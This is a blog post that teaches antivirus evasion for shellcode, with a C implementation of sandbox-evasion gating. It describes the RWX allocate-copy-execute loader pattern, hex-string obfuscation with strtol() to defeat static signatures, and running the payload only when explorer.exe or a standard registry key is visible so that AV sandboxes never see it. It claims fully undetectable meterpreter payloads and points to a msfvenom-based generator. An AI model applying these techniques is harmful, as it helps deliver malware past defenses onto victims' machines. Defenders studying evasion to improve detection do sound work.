Bypassing antivirus the easy way

The theory of how to execute your shellcode from C/C++ code. All of these ways can also be coded in Python, and with PyInstaller plus the Cipher and Crypto libraries you can have a FUD (fully undetectable) shellcode executable in no time. Anyway…

How can you execute shellcode on a system?

  1. Allocate memory with RWX permissions
  2. Copy the shellcode into that location
  3. Execute it (jump to it)
  4. $Profit

Of course, between steps 1 and 3 (before or after the copy) you may need a decrypt function if the shellcode is stored encrypted.

Here are the functions you would use on Windows (on Linux, mmap() with PROT_EXEC or mprotect() takes the place of VirtualAlloc(); memcpy() and the cast are the same):

  1. VirtualAlloc()
  2. memcpy()
  3. ((void(*)())buf)(); (cast the allocated buffer, not the address of VirtualAlloc, to a function pointer and call it)

More on Github

How do Anti-Virus (AV) products work?

When you submit a file for execution the AV performs static and dynamic analysis. First it checks for already-seen suspicious instructions or "strings" in general (see YARA), and then it executes the file in a sandbox. The sandbox has to be fast and must not consume many resources.

Many papers (take a look at the links provided at the end) exploit those two facts and try to slow the app down with huge memory allocations and long loops. The problem is that even a simple user can tell something is wrong just by watching Task Manager :/

Trying to bypass the scanning

I was wondering how you could bypass antivirus using only C++ (no Python trickery 🙂) and no assembly. Also, slowing the program's execution down was not a solution. We need something "stealthy".

I had a bad habit in Python: I used to treat hex-encoded bytes as strings (and call decode('hex')). In C++, strtol() lets me do exactly the same thing to "obfuscate" my shellcode and bypass static analysis: store the shellcode as a string of hex digits and convert it back to bytes at runtime, two digits at a time. Of course we can also use the encoders that msfvenom provides, but they are not actually needed!

By using strtol() we are able to bypass all 32 major AV products except 3, as far as I can recall*. We can bypass 2 more just by adding a fake LoadLibrary call, but one (Microsoft Security Essentials) is still left before the file is FUD. After installing MSE in my VM I started testing when the alert is triggered. After some trial and error I found that the alert comes from the shellcode execution, not from the file itself, so I had to find a way to bypass its sandbox.

What if I check whether a process exists? Same thing again: the sandbox blocks our access to the process list, so the alert keeps popping up. And… here is the trick. We should not bail out when a process does not exist; we should only execute when a well-known process does exist! Inside the sandbox the check fails and the shellcode never runs, so there is nothing to flag; on a real machine the process is there and the payload executes.


  1. Find a process that exists on almost every Windows system (explorer.exe, svchost.exe, etc.)
  2. Check that the process exists
  3. Execute the shellcode only if it does
  4. Profit

Then it is safe to execute the code (remember, we already bypass static analysis with strtol()).

W00t, bypassed! Now the infamous meterpreter shellcode can be executed 🙂

OK, OK, you will say that you have to keep track of which processes every AV product's sandbox hides.

You don't. My tests showed that just adding strtol() and the process trick bypasses all AV products, even with a plain meterpreter payload.

There is more: the same thing with the registry

Replacing the process check with a registry check gives exactly the same outcome, because AV products hide the registry while the file runs in the sandbox.

  1. Find a default registry key that exists on all Windows platforms
  2. Check that the key exists
  3. Execute the shellcode only if it does
  4. Profit
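Both procedures (the process check and the registry check) are the same gate with a different probe, so here is one added C example, not code from the original post, that implements both. On Windows the process probe walks a Toolhelp32 snapshot and the registry probe opens HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion (the post does not name its APIs or key; those are my choices). The POSIX branch, which compares against /proc/<pid>/comm, is not on the page at all; it is there so the gating logic can be exercised on Linux, and the demo gates on its own process name because that one is guaranteed to exist. demo_payload() stands in for the decode/allocate/copy/jump sequence.

```c
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#include <tlhelp32.h>

/* Windows: look for the well-known name (e.g. "explorer.exe") in a process
 * snapshot. An emulator that hides the real process list never returns it. */
static int process_running(const char *name)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe;
    int found = 0;

    if (snap == INVALID_HANDLE_VALUE)
        return 0;
    pe.dwSize = sizeof pe;
    if (Process32First(snap, &pe)) {
        do {
            if (_stricmp(pe.szExeFile, name) == 0) { found = 1; break; }
        } while (Process32Next(snap, &pe));
    }
    CloseHandle(snap);
    return found;
}

/* Windows: the registry variant, with a key every real install has. */
static int registry_key_present(const char *subkey)
{
    HKEY hk;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, subkey, 0, KEY_READ, &hk) != ERROR_SUCCESS)
        return 0;
    RegCloseKey(hk);
    return 1;
}
#else
#include <ctype.h>
#include <dirent.h>

/* POSIX fallback (assumption, not from the post): compare the name against
 * /proc/<pid>/comm of every visible process. */
static int process_running(const char *name)
{
    DIR *d = opendir("/proc");
    struct dirent *e;
    int found = 0;

    if (d == NULL)
        return 0;
    while (!found && (e = readdir(d)) != NULL) {
        char path[64], comm[64];
        FILE *f;
        if (!isdigit((unsigned char)e->d_name[0]))
            continue;
        snprintf(path, sizeof path, "/proc/%s/comm", e->d_name);
        if ((f = fopen(path, "r")) == NULL)
            continue;
        if (fgets(comm, sizeof comm, f) != NULL) {
            comm[strcspn(comm, "\n")] = '\0';
            found = strcmp(comm, name) == 0;
        }
        fclose(f);
    }
    closedir(d);
    return found;
}
#endif

/* The gate: hand control to the payload only when an artifact that exists on
 * every real host is visible. A sandbox that hides it fails the check. */
static int environment_looks_real(const char *proc_name)
{
    if (!process_running(proc_name))
        return 0;
#ifdef _WIN32
    if (!registry_key_present("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"))
        return 0;
#endif
    return 1;
}

/* Stand-in for decode/VirtualAlloc/memcpy/jump; the counter shows whether it ran. */
static int demo_payload_calls;
static void demo_payload(void) { demo_payload_calls++; }

/* Returns 1 if the payload ran, 0 if the environment failed the check. */
static int gated_run(const char *proc_name, void (*payload)(void))
{
    if (!environment_looks_real(proc_name))
        return 0;
    payload();
    return 1;
}

/* Name of the current process, a process that is guaranteed to exist. */
static int self_process_name(char *buf, size_t n)
{
#ifdef _WIN32
    char path[MAX_PATH];
    const char *base;
    if (!GetModuleFileNameA(NULL, path, sizeof path))
        return 0;
    base = strrchr(path, '\\');
    snprintf(buf, n, "%s", base ? base + 1 : path);
    return 1;
#else
    FILE *f = fopen("/proc/self/comm", "r");
    if (f == NULL || fgets(buf, (int)n, f) == NULL) { if (f) fclose(f); return 0; }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';
    return 1;
#endif
}

int main(void)
{
    char me[64];
    if (!self_process_name(me, sizeof me))
        return 1;
    /* On a real Windows target you would gate on "explorer.exe" instead. */
    printf("gate on %s -> %d\n", me, gated_run(me, demo_payload));
    printf("gate on %s -> %d\n", "zz9-not-running", gated_run("zz9-not-running", demo_payload));
    return 0;
}
```

Note the direction of the check: the code never "detects a sandbox" and exits, which is itself a suspicious pattern; it simply does nothing unless the expected artifact is present, so inside the emulator the shellcode bytes are never executed and there is no behaviour to flag.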

[screenshot: NoDistribute scan result without the fake library call]

(It seems that as of 3/3/2017 Ikarus AV is detecting it, but it can be bypassed with a fake library call; NoDistribute then reports it as FUD.)

[screenshot: NoDistribute scan result after the fake library call]

With all of the above being said, I created a simple bash script that generates .cpp files with msfvenom. You have to compile them yourself. GitHub

I hope you found this article helpful. Please take a look at the papers below. They are really cool and they helped me arrive at the above results 🙂

*Also, NoDistribute must be distributing the results, because nothing caught the process technique the previous week, nor the use of strtol() before that :/

[1] https://dl.packetstormsecurity.net/papers/bypass/bypassing-av.pdf

[2] http://packetstorm.foofus.com/papers/virus/BypassAVDynamics.pdf (a really good paper)

[3] https://www.exploit-db.com/docs/40900.pdf (also worth reading)

 
